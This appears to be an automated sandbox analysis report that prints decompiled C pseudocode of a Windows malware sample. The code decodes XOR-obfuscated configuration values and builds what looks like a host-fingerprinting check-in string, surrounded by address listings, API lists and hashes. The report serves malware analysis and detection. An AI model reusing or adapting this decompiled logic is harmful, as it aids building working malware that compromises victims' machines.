                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t49 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t82 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t49 = E00A9A7ED(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t49 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa9d02c = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t50 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t78 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t50 = E00A9A7ED(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t50 == 0) {
                                                                                                                                                                                                                                						L41:
                                                                                                                                                                                                                                						 *0xa9d284 = 5;
                                                                                                                                                                                                                                						goto L42;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                                                                                                                                                							goto L41;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							L42:
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_t51 = 0;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t75 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                								_t51 = E00A9A7ED(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t51 != 0) {
                                                                                                                                                                                                                                								_push(_t51);
                                                                                                                                                                                                                                								_t72 = 0x10;
                                                                                                                                                                                                                                								_t73 = E00A91685(_t72);
                                                                                                                                                                                                                                								if(_t73 != 0) {
                                                                                                                                                                                                                                									_push(_t73);
                                                                                                                                                                                                                                									E00A97095();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_t52 = 0;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t70 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                								_t52 = E00A9A7ED(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t52 != 0 && E00A91685(0, _t52) != 0) {
                                                                                                                                                                                                                                								_t121 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                								E00A945CF(_t121 + 4, _t68);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_t53 = 0;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t65 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                								_t53 = E00A9A7ED(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t53 == 0) {
                                                                                                                                                                                                                                								L59:
                                                                                                                                                                                                                                								_t54 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                								_t22 = _t54 + 0xa9e252; // 0x616d692f
                                                                                                                                                                                                                                								 *0xa9d30c = _t22;
                                                                                                                                                                                                                                								goto L60;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t64 = E00A91685(0, _t53);
                                                                                                                                                                                                                                								 *0xa9d30c = _t64;
                                                                                                                                                                                                                                								if(_t64 != 0) {
                                                                                                                                                                                                                                									L60:
                                                                                                                                                                                                                                									if(_t103 == 0) {
                                                                                                                                                                                                                                										_t56 = 0;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t61 =  *0xa9d2dc; // 0x69b25f44
                                                                                                                                                                                                                                										_t56 = E00A9A7ED(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									if(_t56 == 0) {
                                                                                                                                                                                                                                										_t57 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                										_t23 = _t57 + 0xa9e79a; // 0x6976612e
                                                                                                                                                                                                                                										_t58 = _t23;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t58 = E00A91685(0, _t56);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									 *0xa9d380 = _t58;
                                                                                                                                                                                                                                									HeapFree( *0xa9d270, 0, _t103);
                                                                                                                                                                                                                                									_v12 = 0;
                                                                                                                                                                                                                                									goto L67;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								goto L59;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}






































                                                                                                                                                                                                                                0x00a9245e
                                                                                                                                                                                                                                0x00a92468
                                                                                                                                                                                                                                0x00a9246d
                                                                                                                                                                                                                                0x00a9246d
                                                                                                                                                                                                                                0x00a92468
                                                                                                                                                                                                                                0x00a92474
                                                                                                                                                                                                                                0x00a9248a
                                                                                                                                                                                                                                0x00a92476
                                                                                                                                                                                                                                0x00a92476
                                                                                                                                                                                                                                0x00a92483
                                                                                                                                                                                                                                0x00a92483
                                                                                                                                                                                                                                0x00a9248e
                                                                                                                                                                                                                                0x00a92490
                                                                                                                                                                                                                                0x00a9249a
                                                                                                                                                                                                                                0x00a9249f
                                                                                                                                                                                                                                0x00a9249f
                                                                                                                                                                                                                                0x00a9249a
                                                                                                                                                                                                                                0x00a924a6
                                                                                                                                                                                                                                0x00a924bc
                                                                                                                                                                                                                                0x00a924a8
                                                                                                                                                                                                                                0x00a924a8
                                                                                                                                                                                                                                0x00a924b5
                                                                                                                                                                                                                                0x00a924b5
                                                                                                                                                                                                                                0x00a924c0
                                                                                                                                                                                                                                0x00a924c2
                                                                                                                                                                                                                                0x00a924cc
                                                                                                                                                                                                                                0x00a924d1
                                                                                                                                                                                                                                0x00a924d1
                                                                                                                                                                                                                                0x00a924cc
                                                                                                                                                                                                                                0x00a924d8
                                                                                                                                                                                                                                0x00a924ee
                                                                                                                                                                                                                                0x00a924da
                                                                                                                                                                                                                                0x00a924da
                                                                                                                                                                                                                                0x00a924e7
                                                                                                                                                                                                                                0x00a924e7
                                                                                                                                                                                                                                0x00a924f2
                                                                                                                                                                                                                                0x00a92505
                                                                                                                                                                                                                                0x00a92505
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a924f4
                                                                                                                                                                                                                                0x00a924f4
                                                                                                                                                                                                                                0x00a924fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9250f
                                                                                                                                                                                                                                0x00a9250f
                                                                                                                                                                                                                                0x00a92511
                                                                                                                                                                                                                                0x00a92527
                                                                                                                                                                                                                                0x00a92513
                                                                                                                                                                                                                                0x00a92513
                                                                                                                                                                                                                                0x00a92520
                                                                                                                                                                                                                                0x00a92520
                                                                                                                                                                                                                                0x00a9252b
                                                                                                                                                                                                                                0x00a9252d
                                                                                                                                                                                                                                0x00a92530
                                                                                                                                                                                                                                0x00a92531
                                                                                                                                                                                                                                0x00a92538
                                                                                                                                                                                                                                0x00a9253a
                                                                                                                                                                                                                                0x00a9253b
                                                                                                                                                                                                                                0x00a9253b
                                                                                                                                                                                                                                0x00a92538
                                                                                                                                                                                                                                0x00a92542
                                                                                                                                                                                                                                0x00a92558
                                                                                                                                                                                                                                0x00a92544
                                                                                                                                                                                                                                0x00a92544
                                                                                                                                                                                                                                0x00a92551
                                                                                                                                                                                                                                0x00a92551
                                                                                                                                                                                                                                0x00a9255c
                                                                                                                                                                                                                                0x00a9256a
                                                                                                                                                                                                                                0x00a92574
                                                                                                                                                                                                                                0x00a92574
                                                                                                                                                                                                                                0x00a9257b
                                                                                                                                                                                                                                0x00a92591
                                                                                                                                                                                                                                0x00a9257d
                                                                                                                                                                                                                                0x00a9257d
                                                                                                                                                                                                                                0x00a9258a
                                                                                                                                                                                                                                0x00a9258a
                                                                                                                                                                                                                                0x00a92595
                                                                                                                                                                                                                                0x00a925a8
                                                                                                                                                                                                                                0x00a925a8
                                                                                                                                                                                                                                0x00a925ad
                                                                                                                                                                                                                                0x00a925b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92597
                                                                                                                                                                                                                                0x00a9259a
                                                                                                                                                                                                                                0x00a9259f
                                                                                                                                                                                                                                0x00a925a6
                                                                                                                                                                                                                                0x00a925b8
                                                                                                                                                                                                                                0x00a925ba
                                                                                                                                                                                                                                0x00a925d0
                                                                                                                                                                                                                                0x00a925bc
                                                                                                                                                                                                                                0x00a925bc
                                                                                                                                                                                                                                0x00a925c9
                                                                                                                                                                                                                                0x00a925c9
                                                                                                                                                                                                                                0x00a925d4
                                                                                                                                                                                                                                0x00a925e0
                                                                                                                                                                                                                                0x00a925e5
                                                                                                                                                                                                                                0x00a925e5
                                                                                                                                                                                                                                0x00a925d6
                                                                                                                                                                                                                                0x00a925d9
                                                                                                                                                                                                                                0x00a925d9
                                                                                                                                                                                                                                0x00a925f3
                                                                                                                                                                                                                                0x00a925f8
                                                                                                                                                                                                                                0x00a925fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a925fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a925a6
                                                                                                                                                                                                                                0x00a92595
                                                                                                                                                                                                                                0x00a924fe
                                                                                                                                                                                                                                0x00a924f2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92400
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92432
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92464
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92496
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A924C8
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A924FA
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00A95884,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008,?,00A95884), ref: 00A925F8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008,?,00A95884), ref: 00A9260B
                                                                                                                                                                                                                                  • Part of subcall function 00A91685: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,00A95884,00A925DE,00000000,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005), ref: 00A9168E
                                                                                                                                                                                                                                  • Part of subcall function 00A91685: memcpy.NTDLL(00000000,?,00000000,00000001,?,00A95884), ref: 00A916B1
                                                                                                                                                                                                                                  • Part of subcall function 00A91685: memset.NTDLL ref: 00A916C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3442150357-1536154274
                                                                                                                                                                                                                                • Opcode ID: 6464e3987146eef3e4626f6b1cc807623af8ea4fda58439fb2069085727f975d
                                                                                                                                                                                                                                • Instruction ID: 4063e49bbb1e6d0de4bbaaa939d33b07e614547b9d4aa87f20f499ee5fbc54ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6464e3987146eef3e4626f6b1cc807623af8ea4fda58439fb2069085727f975d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2815270B10204BFCF21DBF4DE85EAF77F9AB88700B254926A402D7115EE39DD819B61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A970F4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				long _t59;
                                                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				int _t71;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                				void* _t78;
                                                                                                                                                                                                                                				intOrPtr _t82;
                                                                                                                                                                                                                                				intOrPtr _t86;
                                                                                                                                                                                                                                				intOrPtr* _t88;
                                                                                                                                                                                                                                				void* _t94;
                                                                                                                                                                                                                                				intOrPtr _t100;
                                                                                                                                                                                                                                				signed int _t104;
                                                                                                                                                                                                                                				char** _t106;
                                                                                                                                                                                                                                				int _t109;
                                                                                                                                                                                                                                				intOrPtr* _t112;
                                                                                                                                                                                                                                				intOrPtr* _t114;
                                                                                                                                                                                                                                				intOrPtr* _t116;
                                                                                                                                                                                                                                				intOrPtr* _t118;
                                                                                                                                                                                                                                				intOrPtr _t121;
                                                                                                                                                                                                                                				intOrPtr _t126;
                                                                                                                                                                                                                                				int _t130;
                                                                                                                                                                                                                                				CHAR* _t132;
                                                                                                                                                                                                                                				intOrPtr _t133;
                                                                                                                                                                                                                                				void* _t134;
                                                                                                                                                                                                                                				void* _t143;
                                                                                                                                                                                                                                				int _t144;
                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                				intOrPtr _t146;
                                                                                                                                                                                                                                				void* _t148;
                                                                                                                                                                                                                                				long _t152;
                                                                                                                                                                                                                                				intOrPtr* _t153;
                                                                                                                                                                                                                                				intOrPtr* _t154;
                                                                                                                                                                                                                                				intOrPtr* _t157;
                                                                                                                                                                                                                                				void* _t158;
                                                                                                                                                                                                                                				void* _t160;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t143 = __edx;
                                                                                                                                                                                                                                				_t134 = __ecx;
                                                                                                                                                                                                                                				_t59 = __eax;
                                                                                                                                                                                                                                				_v12 = 8;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t59 = GetTickCount();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t60 =  *0xa9d018; // 0x9ad51634
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t61 =  *0xa9d014; // 0x3a87c8cd
                                                                                                                                                                                                                                				_t132 = _a16;
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t62 =  *0xa9d010; // 0xd8d2f808
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t63 =  *0xa9d00c; // 0x13d015ef
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t64 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t3 = _t64 + 0xa9e633; // 0x74666f73
                                                                                                                                                                                                                                				_t144 = wsprintfA(_t132, _t3, 3, 0x3f878, _t63, _t62, _t61, _t60,  *0xa9d02c,  *0xa9d004, _t59);
                                                                                                                                                                                                                                				_t67 = E00A95C12();
                                                                                                                                                                                                                                				_t68 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t4 = _t68 + 0xa9e673; // 0x74707526
                                                                                                                                                                                                                                				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                                                                                                                                                				_t160 = _t158 + 0x38;
                                                                                                                                                                                                                                				_t145 = _t144 + _t71;
                                                                                                                                                                                                                                				_t72 = E00A9508C(_t134);
                                                                                                                                                                                                                                				_t133 = __imp__; // 0x74785520
                                                                                                                                                                                                                                				_v8 = _t72;
                                                                                                                                                                                                                                				if(_t72 != 0) {
                                                                                                                                                                                                                                					_t126 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t7 = _t126 + 0xa9e8cc; // 0x736e6426
                                                                                                                                                                                                                                					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                                                                                                                                                					_t160 = _t160 + 0xc;
                                                                                                                                                                                                                                					_t145 = _t145 + _t130;
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _v8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t73 = E00A96706();
                                                                                                                                                                                                                                				_v8 = _t73;
                                                                                                                                                                                                                                				if(_t73 != 0) {
                                                                                                                                                                                                                                					_t121 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t11 = _t121 + 0xa9e8d4; // 0x6f687726
                                                                                                                                                                                                                                					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                                                                                                                                                					_t160 = _t160 + 0xc;
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _v8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t146 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                				_t75 = E00A96DFA(0xa9d00a, _t146 + 4);
                                                                                                                                                                                                                                				_t152 = 0;
                                                                                                                                                                                                                                				_v20 = _t75;
                                                                                                                                                                                                                                				if(_t75 == 0) {
                                                                                                                                                                                                                                					L26:
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, _t152, _a16);
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t78 = RtlAllocateHeap( *0xa9d270, 0, 0x800);
                                                                                                                                                                                                                                					_v8 = _t78;
                                                                                                                                                                                                                                					if(_t78 == 0) {
                                                                                                                                                                                                                                						L25:
                                                                                                                                                                                                                                						HeapFree( *0xa9d270, _t152, _v20);
                                                                                                                                                                                                                                						goto L26;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E00A9A425(GetTickCount());
                                                                                                                                                                                                                                					_t82 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                					__imp__(_t82 + 0x40);
                                                                                                                                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                					_t86 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                					__imp__(_t86 + 0x40);
                                                                                                                                                                                                                                					_t88 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                					_t148 = E00A922AB(1, _t143, _a16,  *_t88);
                                                                                                                                                                                                                                					_v28 = _t148;
                                                                                                                                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                					if(_t148 == 0) {
                                                                                                                                                                                                                                						L24:
                                                                                                                                                                                                                                						HeapFree( *0xa9d270, _t152, _v8);
                                                                                                                                                                                                                                						goto L25;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					StrTrimA(_t148, 0xa9c2ac);
                                                                                                                                                                                                                                					_push(_t148);
                                                                                                                                                                                                                                					_t94 = E00A92629();
                                                                                                                                                                                                                                					_v16 = _t94;
                                                                                                                                                                                                                                					if(_t94 == 0) {
                                                                                                                                                                                                                                						L23:
                                                                                                                                                                                                                                						HeapFree( *0xa9d270, _t152, _t148);
                                                                                                                                                                                                                                						goto L24;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t153 = __imp__;
                                                                                                                                                                                                                                					 *_t153(_t148, _a4);
                                                                                                                                                                                                                                					 *_t153(_v8, _v20);
                                                                                                                                                                                                                                					_t154 = __imp__;
                                                                                                                                                                                                                                					 *_t154(_v8, _v16);
                                                                                                                                                                                                                                					_t100 = E00A93037( *_t154(_v8, _t148), _v8);
                                                                                                                                                                                                                                					_a4 = _t100;
                                                                                                                                                                                                                                					if(_t100 == 0) {
                                                                                                                                                                                                                                						_v12 = 8;
                                                                                                                                                                                                                                						L21:
                                                                                                                                                                                                                                						E00A9651D();
                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                						HeapFree( *0xa9d270, 0, _v16);
                                                                                                                                                                                                                                						_t152 = 0;
                                                                                                                                                                                                                                						goto L23;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t104 = E00A9145F(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                                                                                                                                					_v12 = _t104;
                                                                                                                                                                                                                                					if(_t104 == 0) {
                                                                                                                                                                                                                                						_t157 = _v24;
                                                                                                                                                                                                                                						_v12 = E00A92EA6(_t157, _a4, _a8, _a12);
                                                                                                                                                                                                                                						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                                                                                                                                						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                                                                                                                                						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                                                                                                                                						_t118 =  *_t157;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                                                                                                                						E00A953BB(_t157);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                						if(_v12 == 0) {
                                                                                                                                                                                                                                							_t106 = _a8;
                                                                                                                                                                                                                                							if(_t106 != 0) {
                                                                                                                                                                                                                                								_t149 =  *_t106;
                                                                                                                                                                                                                                								_t155 =  *_a12;
                                                                                                                                                                                                                                								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                                                                                                                                								_t109 = E00A91522(_t149, _t149, _t155 >> 1);
                                                                                                                                                                                                                                								_t148 = _v28;
                                                                                                                                                                                                                                								 *_a12 = _t109;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L19;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                                                                                							L19:
                                                                                                                                                                                                                                							E00A953BB(_a4);
                                                                                                                                                                                                                                							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                								goto L22;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L21;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x00a973d4
                                                                                                                                                                                                                                0x00a97206
                                                                                                                                                                                                                                0x00a97212
                                                                                                                                                                                                                                0x00a97218
                                                                                                                                                                                                                                0x00a9721d
                                                                                                                                                                                                                                0x00a973b5
                                                                                                                                                                                                                                0x00a973bf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a973bf
                                                                                                                                                                                                                                0x00a97229
                                                                                                                                                                                                                                0x00a9722e
                                                                                                                                                                                                                                0x00a97237
                                                                                                                                                                                                                                0x00a97248
                                                                                                                                                                                                                                0x00a9724c
                                                                                                                                                                                                                                0x00a97255
                                                                                                                                                                                                                                0x00a9725b
                                                                                                                                                                                                                                0x00a9726a
                                                                                                                                                                                                                                0x00a97271
                                                                                                                                                                                                                                0x00a9727a
                                                                                                                                                                                                                                0x00a97280
                                                                                                                                                                                                                                0x00a973a9
                                                                                                                                                                                                                                0x00a973b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a973b3
                                                                                                                                                                                                                                0x00a9728c
                                                                                                                                                                                                                                0x00a97292
                                                                                                                                                                                                                                0x00a97293
                                                                                                                                                                                                                                0x00a97298
                                                                                                                                                                                                                                0x00a9729d
                                                                                                                                                                                                                                0x00a9739f
                                                                                                                                                                                                                                0x00a973a7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a973a7
                                                                                                                                                                                                                                0x00a972a6
                                                                                                                                                                                                                                0x00a972ad
                                                                                                                                                                                                                                0x00a972b5
                                                                                                                                                                                                                                0x00a972ba
                                                                                                                                                                                                                                0x00a972c3
                                                                                                                                                                                                                                0x00a972ce
                                                                                                                                                                                                                                0x00a972d3
                                                                                                                                                                                                                                0x00a972d8
                                                                                                                                                                                                                                0x00a973d7
                                                                                                                                                                                                                                0x00a9738b
                                                                                                                                                                                                                                0x00a9738b
                                                                                                                                                                                                                                0x00a97390
                                                                                                                                                                                                                                0x00a9739b
                                                                                                                                                                                                                                0x00a9739d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9739d
                                                                                                                                                                                                                                0x00a972e2
                                                                                                                                                                                                                                0x00a972e7
                                                                                                                                                                                                                                0x00a972ec
                                                                                                                                                                                                                                0x00a972f1
                                                                                                                                                                                                                                0x00a97301
                                                                                                                                                                                                                                0x00a97304
                                                                                                                                                                                                                                0x00a9730a
                                                                                                                                                                                                                                0x00a97310
                                                                                                                                                                                                                                0x00a97316
                                                                                                                                                                                                                                0x00a97319
                                                                                                                                                                                                                                0x00a9731f
                                                                                                                                                                                                                                0x00a97322
                                                                                                                                                                                                                                0x00a97327
                                                                                                                                                                                                                                0x00a9732b
                                                                                                                                                                                                                                0x00a9732b
                                                                                                                                                                                                                                0x00a97337
                                                                                                                                                                                                                                0x00a97343
                                                                                                                                                                                                                                0x00a97347
                                                                                                                                                                                                                                0x00a97349
                                                                                                                                                                                                                                0x00a9734e
                                                                                                                                                                                                                                0x00a97350
                                                                                                                                                                                                                                0x00a97355
                                                                                                                                                                                                                                0x00a9735a
                                                                                                                                                                                                                                0x00a97367
                                                                                                                                                                                                                                0x00a9736f
                                                                                                                                                                                                                                0x00a97372
                                                                                                                                                                                                                                0x00a97372
                                                                                                                                                                                                                                0x00a9734e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a97339
                                                                                                                                                                                                                                0x00a9733d
                                                                                                                                                                                                                                0x00a97374
                                                                                                                                                                                                                                0x00a97377
                                                                                                                                                                                                                                0x00a97380
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a97380
                                                                                                                                                                                                                                0x00a9733f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9733f
                                                                                                                                                                                                                                0x00a97337

APIs
• GetTickCount.KERNEL32 ref: 00A97108
• wsprintfA.USER32 ref: 00A97158
• wsprintfA.USER32 ref: 00A97175
• wsprintfA.USER32 ref: 00A971A1
• HeapFree.KERNEL32(00000000,?), ref: 00A971B3
• wsprintfA.USER32 ref: 00A971D4
• HeapFree.KERNEL32(00000000,?), ref: 00A971E4
• RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A97212
• GetTickCount.KERNEL32 ref: 00A97223
• RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A97237
• RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A97255
  • Part of subcall function 00A922AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?,04FD95B0), ref: 00A922D6
  • Part of subcall function 00A922AB: lstrlen.KERNEL32(?,?,?,00A9A714,?,04FD95B0), ref: 00A922DE
  • Part of subcall function 00A922AB: strcpy.NTDLL ref: 00A922F5
  • Part of subcall function 00A922AB: lstrcat.KERNEL32(00000000,?), ref: 00A92300
